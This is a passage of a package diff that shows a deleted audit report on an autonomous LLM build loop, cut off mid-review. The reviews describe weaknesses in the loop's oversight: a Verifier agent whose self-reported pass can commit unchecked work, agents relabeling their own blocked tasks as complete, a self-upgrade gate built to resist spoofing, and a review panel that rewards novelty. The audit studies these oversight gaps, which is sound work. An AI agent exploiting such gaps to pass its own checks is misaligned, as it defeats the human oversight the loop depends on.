verifyhash 0.1.0 → 0.1.2
- package/README.md +5 -3
- package/cli/agent-hook.js +431 -0
- package/docs/ADOPT.md +15 -5
- package/docs/AGENT-HOOK.md +111 -0
- package/docs/ANCHORING.md +43 -22
- package/docs/PUBLISH-VERIFY-VH.md +45 -0
- package/examples/README.md +185 -0
- package/examples/policy.lenient.json +5 -0
- package/examples/policy.strict.json +6 -0
- package/examples/run.js +366 -0
- package/examples/sample-dataset/README.txt +10 -0
- package/examples/sample-dataset/corpus/cc-by-poem.txt +8 -0
- package/examples/sample-dataset/corpus/mit-notes.txt +4 -0
- package/examples/sample-dataset/data/unlabeled.txt +5 -0
- package/examples/sample-dataset/vendored/gpl-snippet.txt +5 -0
- package/examples/sample-dataset.hints.json +7 -0
- package/examples/sample-parcel/data/manifest-of-contents.txt +7 -0
- package/examples/sample-parcel/data/records.csv +4 -0
- package/examples/sample-parcel/delivery-note.txt +9 -0
- package/package.json +26 -3
- package/verifier/README.md +584 -0
- package/verifier/action/README.md +87 -0
- package/verifier/action/action.yml +146 -0
- package/verifier/build-standalone-html.js +1287 -0
- package/verifier/build-standalone.js +989 -0
- package/verifier/ci/journal.generic.sh +96 -0
- package/verifier/ci/journal.github-actions.yml +99 -0
- package/verifier/ci/reproduce-vh.generic.sh +59 -0
- package/verifier/ci/reproduce-vh.github-actions.yml +49 -0
- package/verifier/ci/verify-service.generic.sh +96 -0
- package/verifier/ci/verify-service.github-actions.yml +88 -0
- package/verifier/ci/verify-vh.generic.sh +75 -0
- package/verifier/ci/verify-vh.github-actions.yml +56 -0
- package/verifier/dist/BUILD-PROVENANCE.json +210 -0
- package/verifier/dist/seal-vh-standalone.js +876 -0
- package/verifier/dist/seal-vh-standalone.js.sha256 +1 -0
- package/verifier/dist/verify-vh-standalone.html +3373 -0
- package/verifier/dist/verify-vh-standalone.html.sha256 +1 -0
- package/verifier/dist/verify-vh-standalone.js +5123 -0
- package/verifier/dist/verify-vh-standalone.js.sha256 +1 -0
- package/verifier/lib/canonical.js +141 -0
- package/verifier/lib/keccak.js +30 -0
- package/verifier/lib/keccak256-vendored.js +206 -0
- package/verifier/lib/merkle.js +145 -0
- package/verifier/lib/revocation-core.js +606 -0
- package/verifier/lib/revocation.js +200 -0
- package/verifier/lib/seal-cli.js +374 -0
- package/verifier/lib/seal-evidence.js +237 -0
- package/verifier/lib/secp256k1-recover.js +249 -0
- package/verifier/package.json +39 -0
- package/verifier/verify-vh.js +3376 -0
- package/docs/ADOPTION.json +0 -11
- package/docs/AUDIT.md +0 -55
- package/docs/DECIDE.md +0 -47
- package/docs/DECISIONS-PENDING.md +0 -27
- package/docs/DEPLOY-PUBLIC-SITE.md +0 -301
- package/docs/ENGINE-LEDGER.json +0 -12
- package/docs/LOOP-AUDIT-2026-07-03.json +0 -580
- package/docs/LOOP-HARDENING-PLAN.md +0 -44
- package/docs/METRICS.jsonl +0 -31
- package/docs/MORNING.md +0 -204
- package/docs/STRATEGY-ARCHIVE.md +0 -5055
- package/docs/SUPERVISOR-RUNBOOK.md +0 -52
- package/docs/USAGE-BUDGET.json +0 -121
@@ -1,580 +0,0 @@
{
"summary": "Independent multi-dimension audit of the verifyhash autonomous build loop: engine, verification integrity, strategy value, economics, self-mod safety, supervision, outside-skeptic",
"agentCount": 7,
"logs": [
"reviews complete: 7/7 returned"
],
"result": {
"reviews": [
{
"area": "Engine Architecture (build-loop.workflow.js)",
"grade": "B",
"working_well": [
"Failure isolation is genuinely well-engineered: every agent call site is either try/caught or null-filtered. Planner throws degrade to dead rounds with a 2-strike exit (build-loop.workflow.js:371-380), decider/strategist throws don't abort (392, 400), build/verify throws become failed attempts then BLOCK (421-429), and one reviewer throwing is dropped via .catch(...)=>null + .filter(Boolean) so it can't veto an already-verified build (455-456). A single bad agent genuinely cannot wedge or corrupt a run.",
"Model pins are now fully explicit at every call site (engine #23) — roster=haiku(330), preflight/plan/decide/verify/manager/gatekeeper=opus, strategize/architect=fable(399,667), build attempt1=fable else opus(419), integrate/block=haiku(437,532,571). I found NO call site that silently inherits the session model.",
"The self-upgrade gates are real, not theatre. validate-driver.cjs strips comments AND string literals before checking protected invariants (stripCodeOnly, lines 21-40), so the correctness gate can't be spoofed by leaving 'verdict.pass && verdict.testsPass' in a comment; it also requires the gate be used as a conditional (55-57). smoke-driver.cjs actually executes the candidate with FAIL_VERIFY and asserts no commit is emitted (header lines 1-7).",
"endReason accuracy (a named pending finding) is FIXED and correct: 'iters' now means iter===MAX_ITERS only; fall-through with iter<MAX_ITERS is relabeled 'drained' (line 588) and round-cap exhaustion 'rounds' (line 578).",
"The rework path degrades safely: the verified pre-rework build/verdict are snapshotted (line 516) and a rework that breaks verification falls back to the last green build and still commits (525-535) rather than throwing away verified value."
],
"problems": [
{
"title": "No per-agent or wall-clock timeout anywhere — a hung agent wedges the entire run indefinitely",
"evidence": "Every agent() call (e.g. build-loop.workflow.js:419-420, 450-452, 663) passes only {label,phase,schema,model}; no timeout option exists. The resilience story only catches THROWS (try/catch at 421, 518). A hang is not a throw.",
"impact": "The loop's only bounds are budget.remaining()<80000 (365) and iteration caps. If any agent stalls without erroring, the run blocks forever, never reaching Manager/Report/Architect — the exact self-perpetuating failure the try/catch blocks were written to prevent, just via hang instead of throw.",
"fix": "Add a timeout to the agent primitive (or wrap each call in Promise.race with a deadline) and treat a timeout as a caught failed attempt, identical to the existing throw path.",
"priority": "P1"
},
{
"title": "driver-writes-METRICS still unfixed: the authoritative telemetry line is written by an Opus agent, not the driver",
"evidence": "The driver computes the entire stats string itself (build-loop.workflow.js:661), then hands it to reporterPrompt on model:'opus' (663) whose prompt (266-274) is a 4-line plea to 'COPY VERBATIM… do NOT recompute, infer, normalize, round, correct'.",
"impact": "The one cross-run signal every other role reads (avg/minUsefulness, endReason, humanGated) can be silently mangled by the reporter, and it burns an Opus call to append one pre-computed line plus a prose MORNING.md. Constraint: the driver has no file-I/O primitive (smoke-driver injects only agent/parallel/phase/log/args/budget, line 43), so a true driver-write needs the harness to expose a write primitive.",
"fix": "Expose a file-write primitive to the driver and have it append the METRICS line itself; until then, at minimum drop the reporter agent from opus to haiku since its job is a verbatim append plus a prose summary.",
"priority": "P1"
},
{
"title": "All numeric telemetry analysis is outsourced to LLM prose — root cause behind qualityStall duplication AND the hot-read-slicing finding",
"evidence": "qualityStall is computed by the preflight AGENT via 17 lines of prose arithmetic (build-loop.workflow.js:146-162) then RE-DERIVED by the strategist agent in prose (183-189). hot-read slicing is still unfixed: preflight (144), strategist (189), manager (249), architect (281) each independently 'read the last ~5/6 lines of METRICS.jsonl' themselves. The driver never reads METRICS at all.",
"impact": "The same 5 lines are re-tailed by 4+ agents per run, each trusted to slice correctly (fine at 31 lines/5.6KB today, unbounded as it grows), and the stall math lives in two prose copies that can drift.",
"fix": "Give the driver a file-read primitive; slice the last N METRICS lines once, compute qualityStall in code, and inject both into the reader prompts instead of instructing each agent to read+tail+re-derive.",
"priority": "P2"
},
{
"title": "git add -A at integrate sweeps unrelated uncommitted edits into task commits; end-phase edits are left uncommitted for the next run",
"evidence": "integratePrompt runs `git add -A && git commit` (build-loop.workflow.js:301). Strategist/Decider edit BACKLOG.md/STRATEGY.md in earlier rounds (204, 174-176). Manager (team.json, 263), Reporter (METRICS/MORNING, 267-273) and Architect/Gatekeeper (engine swap, 295) all write AFTER the final integrate with no commit — recovered only by the next run's Preflight 'wip: recover uncommitted changes' catch-all (141-142).",
"impact": "Commits contain cross-task bleed, and every run's own telemetry/team/engine changes are committed by the following run (or a human reconcile, e.g. c177de7) rather than atomically — fragile git history, and a run that dies after integrate leaves these changes dangling.",
"fix": "Scope the integrate commit to the task's filesChanged and add an explicit end-of-run commit for METRICS/MORNING/team/engine after the Report/Architect phases.",
"priority": "P2"
},
{
"title": "No checkpointing or partial-run resume: a crash before the Report phase loses all telemetry for the run",
"evidence": "results/newlyPlanned/reworkEvents are in-memory only (build-loop.workflow.js:353-356); METRICS is written once at the very end (663). Any unhandled failure or hang before Report means the run leaves committed code in git but zero METRICS/MORNING record.",
"impact": "The cross-run signal the Strategist/Manager/Architect depend on has silent holes exactly when a run fails — the runs most worth diagnosing are the ones that vanish from telemetry.",
"fix": "Append a partial METRICS line incrementally (or a checkpoint file) as each task integrates, so a crashed run still records what it built.",
"priority": "P2"
},
{
"title": "Prompt bloat: the same quality-stall instruction is restated 3-4 times per prompt, paid on every run across ~8 VISION-carrying calls",
"evidence": "strategistPrompt (build-loop.workflow.js:178-206) states the quality-stall directive as the mechanical flag, THEN 'still confirm against the data', THEN re-derives the avgUsefulness comparison in prose, THEN 'flat-and-mediocre' again — ~28 lines for one instruction. VISION (29-58) is injected into decider, strategist, builder, reviewer×5, manager, architect.",
"impact": "Redundant tokens on every agent call, every run — recurring spend against the 120M/week governor with no behavioral gain over a tight single statement.",
"fix": "Collapse the qualityStall guidance to one sentence (the flag is already computed) and trim VISION to the guardrails agents actually act on.",
"priority": "P3"
},
{
"title": "Historical comments assert a premise the live METRICS contradicts; 100% first-shot verify hints the Verifier is a weak gate",
"evidence": "Comments at build-loop.workflow.js:357-360, 490, 636 reason from 'verified pinned at exactly 4 for 10-11 runs while MAX_ITERS=8', but METRICS shows verified=8 on ~10 of the last 12 runs. The two most recent runs log fableFirstShots:8 / fableFirstShotVerified:8 — 100% first-attempt verify pass.",
"impact": "The endReason-honesty and panelSize rationales are anchored to an obsolete state. An 8/8 first-shot verify rate where the same loop authors task, tests, and acceptance criteria suggests the independent Verifier is closer to a rubber stamp than an adversarial gate — undermining 'verified' as a value signal.",
"fix": "Prune stale premises from comments and add telemetry on how often the Verifier actually fails an attempt (currently invisible) to confirm the gate has teeth.",
"priority": "P3"
}
],
"summary": "The engine is a competently built autonomous orchestrator whose standout strengths are failure isolation (every agent call is caught or null-filtered so no single agent can wedge or corrupt a run) and a genuinely non-trivial two-gate self-upgrade path with comment/string-stripping to prevent spoofing. Model pins are fully explicit with no silent inheritance, and the named endReason finding is correctly fixed. The dominant weakness is that the driver owns no file I/O, so it outsources all telemetry reading, writing, and trend arithmetic to LLM prose — this single gap is the root of three separate issues: driver-writes-METRICS (still unfixed, an Opus agent begged to copy a string verbatim), hot-read slicing (still unfixed, 4+ agents re-tail METRICS each run), and a qualityStall computation duplicated across two agents. Beyond that, the absence of any per-agent timeout means a hung (not thrown) agent defeats the otherwise-careful resilience design, and there is no checkpoint/resume so a crash before the final Report phase erases the run from telemetry entirely."
},
{
"area": "Verification Integrity — can bad work get marked VERIFIED?",
"grade": "C+",
"summary": "The pipeline has real structural separation — Builder, a single independent Verifier, a usefulness panel, and a separate Integrator that writes the VERIFIED flip only after the driver's gate passes — and my spot-check (T-70.1: 37 genuine passing tests, real fail-closed assertions) shows the work being shipped is honest, well-tested code. BUT the correctness gate is architecturally soft: the engine NEVER runs the 3981-test suite itself. The only thing standing between bad work and a VERIFIED commit is one Opus agent's self-reported `verdict.pass && verdict.testsPass` booleans (build-loop.workflow.js:430,434) — there is zero mechanical execution or exit-code check. So bad work CAN in principle be marked VERIFIED if the Verifier hallucinates or skips the run; the system substitutes agent honesty for a mechanism, which is a notable gap for a product whose whole thesis is \"don't trust, verify.\" The recurring BLOCKED-but-actually-done bug (T-46.1/T-61.1/T-63.1) is unfixed and exposes the recording pipeline's fragility, and the median aggregation deliberately hides lone hard dissent.",
"working_well": [
"Builder cannot self-mark VERIFIED: the flip is written by a separate Integrator agent (integratePrompt, line 300-310; invoked line 571/532) and ONLY after the driver's own gate `verdict.pass && verdict.testsPass` evaluates true (line 430/434). The Builder's self-reported `testsPass` (BUILD_SCHEMA) is NOT the gate — only the independent Verifier's verdict is.",
"The Verifier is genuinely independent of the Builder and instructed to distrust it (verifierPrompt line 227: 'trust nothing it claims'; step 4 'hunt for cheats — empty assertions, faked criteria, broken unrelated tests').",
"The gate is a protected invariant the Architect cannot silently remove: scripts/validate-driver.cjs:52-58 hard-fails any candidate engine where the literal `verdict.pass && verdict.testsPass` is absent from executable code or not used as a conditional guard.",
"The work is real. Spot-check of VERIFIED T-70.1 (cli/core/anchor-binding.js) ran green — 37 passing tests with substantive fail-closed/totality/hostile-input assertions, not empty stubs.",
"The Verifier does in practice catch a red full suite: the T-63.1 episode (BACKLOG.md:4457) shows it blocked a task because 16 UNRELATED tests were failing — evidence the full-suite instruction is being honored, not skipped.",
"Rework degrades safely: a rework that breaks verification falls back to the already-verified pre-rework build (line 525-536) rather than destroying verified value, and makes exactly one repair attempt (no unbounded loop)."
],
"problems": [
{
"title": "The 3981-test suite gates nothing mechanically — the commit gate is a single LLM's self-reported boolean",
"evidence": "build-loop.workflow.js:430 `if (verdict && verdict.pass && verdict.testsPass) break` and :434 are the ONLY gate; `verdict` comes from VERIFY_SCHEMA (line 109-113) — LLM structured output. grep for `hardhat|exec|spawn|child_process` across build-loop.workflow.js + scripts/validate-driver.cjs + scripts/smoke-driver.cjs returns ONLY prompt-string mentions (TEST_CMD line 27, builderPrompt line 218). The engine never runs `npx hardhat test` or checks an exit code.",
"impact": "If the Verifier agent hallucinates testsPass:true, runs only a subset despite instructions, or errors in a way that yields an optimistic object, bad/red work commits and is flipped to VERIFIED. For a product whose entire value proposition is mechanical tamper-evidence, the build loop's own correctness gate rests on trust, not verification — the exact anti-pattern the product sells against.",
"fix": "Have the DRIVER (not an agent) run the test command and capture the real exit code, then AND it into the gate: `const suiteGreen = runShell(TEST_CMD).code===0; if (verdict.pass && suiteGreen) …`. Keep the Verifier for acceptance-criterion judgement, but make the pass/fail of the suite a mechanical fact the engine observes, and add a validate-driver invariant requiring it.",
"priority": "P1"
},
{
"title": "Recurring BLOCKED-but-actually-COMPLETE mislabel (T-46.1/T-61.1/T-63.1) is unfixed at the engine level",
"evidence": "Two root causes both still live: (1) an agent THROW routes straight to BLOCKED (line 421-429 sets verdict=null → line 434 BLOCK) even when the Builder already wrote correct code; (2) the full-suite gate means UNRELATED breakage blocks a perfect task — T-63.1 (BACKLOG.md:4457) was blocked because STRATEGY.md exceeded a doc-size test budget (16 failures in strategy.archive/size-guard, ZERO in the task's own code). The Builder's files remain in the working tree and the NEXT run's preflight commits them as 'wip: recover uncommitted changes' (preflightPrompt line 141), so the artifact lands in git while BACKLOG says BLOCKED. Each of the 3 needed a manual Decider reconcile.",
"impact": "The landing/recording pipeline can permanently mislabel completed, tested work as failed, stalling dependents and requiring human reconciliation. It also proves the correctness gate is coupled to self-inflicted, unrelated doc-rot state — any task can be blocked by breakage it did not cause.",
"fix": "On an agent throw, distinguish 'infrastructure error' from 'genuine criteria failure' — retry or mark NEEDS-RECONCILE, not BLOCKED, and never leave completed work uncommitted-but-blocked. Separately, scope the acceptance gate so a task fails only on regressions it introduced (baseline the suite before the build; compare deltas) rather than on pre-existing unrelated red.",
"priority": "P1"
},
{
"title": "Median aggregation silently suppresses a lone hard dissent on usefulness",
"evidence": "median([5,5,5,5,2]) = 5 (line 326, 478). The usefulness-floor rework trigger keys on the MEDIAN (line 505 `usefulness <= 3`), so a reviewer scoring a deliverable 2/5 while the other four say 5 produces recorded usefulness 5 AND triggers no rework. A lone dissenter can only force a repair by ALSO setting needsRework=true (line 457) — a separate boolean. Dissent expressed purely as a low score is invisible.",
"impact": "A single reviewer who correctly identifies a task as near-useless or subtly wrong is overridden with no trace in METRICS and no rework pass. The engine #22 comment (line 459-475) intends this to kill a panel-width artifact, but the side effect is that genuine minority-correct dissent on the value axis is discarded.",
"fix": "Keep median for the trend metric but preserve dissent as a signal: trigger the rework/repair path when ANY reviewer scores <=2 (not just the median), OR record both median and min in METRICS so a suppressed hard dissent stays visible cross-run.",
"priority": "P2"
},
{
"title": "Verifier and review panel both see the Builder's self-summary — not blind-independent",
"evidence": "verifierPrompt line 231 injects `Builder reported: ${build.summary}`; reviewerPrompt line 241 injects `Builder summary: ${build.summary}`. Neither judges the diff blind.",
"impact": "Anchoring bias: the Builder's framing ('this correctly handles X, all criteria met') primes the very agents meant to independently confirm it. The 'trust nothing it claims' instruction mitigates but cannot eliminate framing effects, and there is exactly ONE correctness checker (no correctness panel) — a single anchored point of failure for the whole gate.",
"fix": "Give the Verifier the task acceptance criteria and the diff WITHOUT the Builder's prose conclusion (or provide the summary only as 'unverified claims to check against', already partly the intent). Consider a second independent verifier for shared-core/contract changes.",
"priority": "P2"
},
{
"title": "100% first-attempt verify pass rate is an un-investigated leniency signal",
"evidence": "docs/METRICS.jsonl last two runs: fableFirstShots:8/fableFirstShotVerified:8 (2026-07-02 08:25) and 8/8 (2026-07-02 18:51). Every task passed the independent Verifier on attempt 1 with no retry, two runs running.",
"impact": "Either the tasks are so incremental that verification is trivial (the qualityStall/plateau the loop itself keeps flagging — avgUsefulness clustering ~3.75, min stuck at 3), or the Verifier is rubber-stamping. Both undermine the gate's value: a gate that never rejects is not measurably gating.",
"fix": "Add a periodic adversarial calibration: inject a deliberately-broken build (mutation test / known-red diff) and confirm the Verifier fails it. If it passes a planted-red build, the gate is decorative.",
"priority": "P2"
},
{
"title": "STRATEGY.md sits 514 bytes from a suite-reddening cliff that the Strategist appends to every run",
"evidence": "`stat STRATEGY.md` = 81406 bytes; test/strategy.size-guard.test.js:98 caps at SIZE_BUDGET.MAX_BYTES and test/strategy.archive.test.js:260 caps at 80*1024=81920. The Strategist appends a dated '## Direction' entry nearly every run (strategistPrompt line 203-205).",
"impact": "One ordinary Strategist append pushes the ENTIRE suite red, which (via the full-suite gate) blocks the run's unrelated tasks — this is precisely what already happened in T-63.1. A self-inflicted, recurring correctness-gate outage is armed and one commit away.",
"fix": "Make the size-budget self-heal (archive-direction.cjs) run in preflight BEFORE any build, or exclude doc-size invariants from the per-task acceptance gate so document housekeeping cannot block product tasks.",
"priority": "P2"
},
{
"title": "Dissenter-only re-score merges stale votes cast on the pre-rework code",
"evidence": "build-loop.workflow.js:557-561: after successful rework, only `dissenters` re-vote; satisfied reviewers' ORIGINAL votes (cast on the OLD code) are merged via `mergedVotes` and collapsed through median. The satisfied reviewers never see the amended artifact.",
"impact": "If the rework introduces a defect that a previously-satisfied reviewer would have caught, it is missed — their stale 5/5 stands on code they never saw. The recorded post-rework usefulness can therefore over-state the amended deliverable. Cost-motivated (engine #24 saved ~10-20 Opus calls/run), but trades correctness for tokens.",
"fix": "At minimum re-run the full panel on reworks that touch shared-core/contract files; for narrow doc/test reworks the dissenter-only path is acceptable. Gate the shortcut on the diff's blast radius, not unconditionally.",
"priority": "P3"
}
]
},
{
"area": "STRATEGY & VALUE",
"grade": "C",
"summary": "The loop is building MORE things, not the RIGHT things — 11 EPICs (61–71) in ~4 days, all in the same trust/provenance vertical, with zero external adoption signal anywhere in the system. The damning detail is that the loop DIAGNOSED this precisely (EPIC-61's own charter says \"building more IS the stall\" and names the humanGated=3 ceiling as a GTM mismatch) and then shipped ten more capability EPICs (62–71). The machinery to recognize stagnation exists and once genuinely fired (qualityStall → EPIC-61 pivot), and a few artifacts (P-1's decidability, the self-serve Stripe path, verifyhash.com) point at revenue — but the reward signal is entirely self-referential (a 5-reviewer panel rating \"usefulness & design quality\" by reading its own changed files), so novelty reliably satisfies the brake and the loop never feels the absence of users.",
"working_well": [
"qualityStall is a real, mechanically-computed brake (build-loop.workflow.js:145-162, four clauses) that HAS fired and produced a genuine strategic pivot: EPIC-61's charter explicitly cites 'The qualityStall flag FIRED and humanGated has been pinned at 3 for ~20 runs' and pivots from capability-building to a first-dollar convergence — the brake is not decorative.",
"P-1 (token framing, STRATEGY.md:198-226) is genuinely decision-ready: crisp A/B options, honest pros/cons, a stated recommended default (soulbound/Option A), and a clear scope (gates only EPIC-3). This is what a decidable proposal should look like.",
"The self-serve revenue path is actually built, not just proposed: go-live-preflight (EPIC-61), fulfill-webhook (EPIC-62), plan catalogs + `license fulfill`, a free-vs-paid gate, and docs/ADOPT.md — the human's remaining work is genuinely reduced to key+price+Stripe rather than code.",
"Honest boundary discipline is consistent and real: every timestamp/trust claim is repeatedly qualified as 'ts is self-asserted, NOT a trusted timestamp without P-3' (e.g. P-9 integrity-journal sub-note, STRATEGY.md:712-716). The loop does not overclaim what it built.",
"P-8's 2026-06-26 sharpening (STRATEGY.md:620-654) is legitimately good GTM thinking: pick the lighter-gated vertical (evidence) first, one concrete buyer archetype, a 3-step no-slide-deck first contact, and a 2-week time box with an explicit 'if zero, switch channel not build more product' exit."
],
"problems": [
{
"title": "The usefulness panel rewards self-assessed novelty; nothing in the entire system measures adoption or revenue",
"evidence": "The Critic lens is literally 'overall usefulness & design quality' (build-loop.workflow.js:136); reviewers 'judge it ONLY through your lens. Read the changed files' (line 240) — the score is an internal code-quality judgment. METRICS.jsonl tracks verified/avgUsefulness/minUsefulness/humanGated only; no field tracks downloads, users, or dollars. Product has zero users/revenue after 290+ commits and this is invisible to every gate.",
"impact": "The loop cannot distinguish 'shipped genuine value' from 'shipped a clean new CLI verb nobody wants.' Recent avgUsefulness recovered 2.5→3.88→4.13 (METRICS 2026-06-26..07-02) specifically by 'launching a genuinely new on-market vertical' (AGENTTRACE) — i.e. the panel rewarded pure novelty, which is exactly the failure mode.",
"fix": "Add an external-signal input the panel/qualityStall must weigh: even a manually-updated docs/ADOPTION.json (downloads, pilot count, first-dollar Y/N) that a strategist prompt reads. Until an external number moves, cap any brand-new-vertical EPIC's reward. Novelty with zero adoption should score LOW, not 4/5.",
"priority": "P1"
},
{
"title": "EPIC inflation: 11 EPICs in ~4 days, all one vertical, after the loop itself concluded 'building more IS the stall'",
"evidence": "EPICs 61–71 all dated 2026-07-01→07-03, all trust/provenance (BACKLOG headers). EPIC-61's charter (BACKLOG.md:4394) states the capability surface is 'exhaustively shipped and green — 19K CLI lines, 145 test files, ~15 verticals... There is no unbuilt capability worth adding on this axis; building more IS the stall.' The loop then created EPIC 62,63,64,65,66,67,68,69,70,71 anyway. The latest Direction note (STRATEGY.md:113-131) proposes yet two more (EPIC-70/71).",
"impact": "Effort compounds on an axis with proven zero marginal value while the actual bottleneck (a human GTM action) is untouched. The backlog is now ~72 EPICs; STRATEGY.md is 757 lines and required a purpose-built auto-archiver + size-guard (the T-63.1 decision) to manage bloat it keeps generating.",
"fix": "Give the Strategist a hard 'frontier is saturated' state: when humanGated has been pinned N runs AND capability count exceeds a threshold, the only legal outputs are (a) a non-code distribution task (npm pack-and-install smoke, funnel page) or (b) return newTasks:[] and idle. Forbid opening a new vertical while an existing built vertical has zero users.",
"priority": "P0"
},
{
"title": "The ~11 needs-human proposals are mostly the SAME 2-3 asks repeated per-vertical, buried in unreadable walls of text",
"evidence": "P-8 itself admits 'the SAME precondition is buried in each [P-3,P-5,P-6,P-7]... a human could not see that ONE pilot satisfies all four' (STRATEGY.md:562-565). 'Land a design partner' recurs in P-4, P-5#3, P-6#3, P-7#3, P-8. 'Pick price + free/paid split' recurs in P-6, P-7, P-9, P-10. 'Provision vendor key' recurs in P-3, P-6#1, P-7#1. P-3 spans ~75 lines with 5 stacked UPDATE blocks; P-8 spans ~100 lines with nested SHARPENING/POINTER layers.",
"impact": "Genuinely distinct revenue decisions number ~3 (provision-key+price+Stripe/npm; land-a-partner; token framing), but are presented as 11 proposals a human must parse. 'Decision-ready' prose has ballooned into the opposite of decidable — a 100-line proposal cannot be acted on quickly, defeating the stated goal.",
"fix": "Enforce a proposal length cap and a one-line 'THE DECISION:' + 'RECOMMENDED:' header per proposal (P-1's format). Collapse P-4/P-5/P-6/P-7 delivery asks into P-8 and DELETE the duplicated bodies rather than cross-referencing them. Append UPDATE notes to a changelog, not the proposal body.",
"priority": "P1"
},
{
"title": "qualityStall measures panel morale, and the engine was tuned to make it fire LESS, not to measure value better",
"evidence": "The median-over-min aggregation change (build-loop.workflow.js:459-478) was made explicitly so 'a SINGLE harsh reviewer' no longer floors a task and the stall stops firing on 'four 5s and one 2.' Combined with the panel being self-referential, the brake clears whenever the majority of reviewers like the code — which a shiny new vertical reliably achieves (avg back to 4.13). qualityStall fired once (→EPIC-61) but the subsequent ten EPICs prove it has no teeth against the core build-more behavior.",
|
|
172
|
-
"impact": "The one self-braking mechanism is satisfiable by the exact behavior it should suppress. It brakes on reviewer pessimism, not on real-world non-adoption, so it will never stop a stream of well-built, unwanted features.",
|
|
173
|
-
"fix": "Keep median for correctness noise, but add an orthogonal 'novelty-without-adoption' penalty that median cannot wash out: if a task opens a new vertical/verb and ADOPTION signal is unchanged, force minUsefulness contribution ≤2 regardless of panel. Tie qualityStall to the external signal, not only to internal votes.",
|
|
174
|
-
"priority": "P1"
|
|
175
|
-
},
- {
- "title": "The right next steps for first revenue are non-code and the loop cannot represent 'stop and hand off' as an outcome",
- "evidence": "Every run ends with newTasks and new EPICs; endReason is 'iters' or 'frontier' but never 'handoff-blocked' (METRICS.jsonl). The lowest-friction first-dollar path per the loop's own EPIC-61 analysis is human-only (provision key, set price, wire Stripe, npm publish P-9 step 1). No EPIC can cross that, yet the loop substitutes EPIC 68-71 (new CLI: vh agent, anchor-artifact, agenttrace-coverage) instead of idling.",
- "impact": "The three highest-leverage moves toward first users — (1) publish to npm + a clean-room `npx verifyhash` install smoke test to make P-9 a one-command human step, (2) one polished converting funnel surface on the already-live verifyhash.com (extend EPIC-66's in-browser challenge into the landing path), (3) actually running the P-8 evidence pilot — are respectively barely-touched, partial, and human-only. The backlog does NOT contain a 'get the first user' EPIC because the loop treats non-buildable work as out of scope rather than as the priority.",
- "fix": "Make 'return newTasks:[] and idle with a single sharpened handoff' a first-class, rewarded Strategist outcome when the frontier is GTM-blocked. Before opening any new vertical, require the distribution prerequisites (published package, working funnel link) to be DONE. Prioritize the two buildable distribution tasks above over any new verb.",
- "priority": "P0"
- },
- {
- "title": "'Reconcile not rebuild' pattern lets the loop self-grade stuck work as done",
- "evidence": "Three Decider entries (T-46.1, T-61.1, T-63.1 — STRATEGY.md:16-77) each take a task BLOCKED after 3 auto-build failures and flip it BLOCKED→TODO/verify-only by declaring 'the artifact ALREADY EXISTS' and rewriting acceptance into 'verify-only checks.' The rationale each time: 'a broken X could not produce a green test suite.'",
- "impact": "While often legitimate (the harness genuinely records false failures), this is an unaudited self-exoneration loop: the same agent that failed to land work re-defines the work as already-complete and lowers its own bar to verify-only. Repeated three times, it erodes the meaning of BLOCKED and inflates the verified count.",
- "fix": "Require reconcile decisions to cite the specific commit that shipped the artifact and a full-suite run log, and mark such tasks with a distinct RECONCILED status in METRICS (not counted as fresh verified) so a reader can separate real completion from bookkeeping cleanup.",
- "priority": "P2"
- }
- ]
- },
- {
- "area": "Economics & Efficiency",
- "grade": "C",
- "working_well": [
- "The Fable-builder tiering is a genuine, data-backed win. Builder attempt-1 runs Fable, retries run Opus (build-loop.workflow.js:419). Cumulative first-shot rate is 16/16 (100%) across the two trial runs (METRICS.jsonl last 2 lines: fableFirstShots 8/8 twice) vs the ~33% Opus baseline. Arithmetic: at 33% first-shot the Opus path averages ~3 build+verify passes/task; Fable at ~2x price but 1 pass = ~2 cost-units vs ~3 for Opus on the builder line (~33% cheaper) AND avoids ~2 full-suite Verifier re-runs per task. Blocked tasks went 2->0 (wf_c9795182 had 2 BLOCKED; both fable runs 0). Net cheaper: yes.",
- "The engine already self-corrected two of the efficiency levers I would have flagged: engine #22 switched panel aggregation from MIN to MEDIAN (line 322), and engine #24 added a dissenter-only re-score so a single low vote no longer re-runs the whole 5-wide panel (lines 444-451). Cheap roles are correctly tiered down: roster/block/integrate run on haiku+effort:low (lines 330,437,532,571).",
- "There IS builder-side test tiering: the Builder is told to run only a targeted subset while iterating and reserve the full suite for broad/shared-core changes (line 220), so the expensive full run is not paid on every builder inner-loop iteration.",
- "endReason telemetry is now honest: the engine distinguishes 'iters' (true MAX_ITERS hit), 'drained', 'rounds', 'budget', 'frontier', 'planner-error' (lines 578-588), after a documented period where 'iters' was masquerading over runs that only built 4 tasks. That is exactly the kind of instrumentation needed to reason about cost."
- ],
- "problems": [
- {
- "title": "No per-run cost cap — the governor throttles run FREQUENCY, not run MAGNITUDE, which is what is actually growing",
- "evidence": "The only in-run stop conditions are MAX_ITERS=8 (line 22), MAX_ROUNDS=24 (line 24), and budget.remaining()<80000 (line 365) — but budget.total is only checked if truthy and the 80K floor is negligible. There is no wall-clock or token ceiling per run. Durations are climbing: 5.2h (fable#1) -> 8.3h (wf_c9795182) with the current run past 6h and still running. The governor (docs/USAGE-BUDGET.json) is a 2h cooldown + 120M/week BETWEEN runs.",
- "impact": "A single pathological run can burn an unbounded fraction of the weekly 120M budget before the cooldown ever engages. The 12.1M-token TaskStopped run (USAGE-BUDGET runs[]) is the existing proof — it took a human interrupt to stop it, not the governor.",
- "fix": "Add a hard per-run token cap (e.g. break when cumulative subagent_tokens > estPerRunTokens*1.5) and/or a wall-clock cap in the while-loop at line 363, with endReason='run-cap'. This bounds magnitude directly instead of relying on the between-run cooldown.",
- "priority": "P1"
- },
- {
- "title": "The 5-reviewer Critique panel is the single largest fixed per-task token block and runs full-width on every task regardless of blast radius",
- "evidence": "Every task fans out to up to 6 Opus reviewers concurrently (lines 331 slice(0,6), 451 model:'opus'). At 5 reviewers x 8 tasks that is 40 Opus review calls/run, each reading the diff+context. Per-task agent budget is ~12 agents (agent_count 97 for 8 tasks, fable#2 note), so the panel alone is ~40% of per-task agents. A one-file CLI-verb change (most tasks, e.g. T-69.2, T-70.2) gets the same 5-wide panel as a shared-core/contract change.",
- "impact": "This is the biggest single controllable token lever. Trimming to 3 reviewers for routine tasks and reserving 5-6 for shared-core/contract diffs would cut ~16 Opus review calls/run.",
- "fix": "Scale panel width by blast radius: default 3 reviewers, escalate to the full panel only when the diff touches contracts/shared-core (the same heuristic the Builder already uses at line 220). Keep the dissenter-only re-score.",
- "priority": "P1"
- },
- {
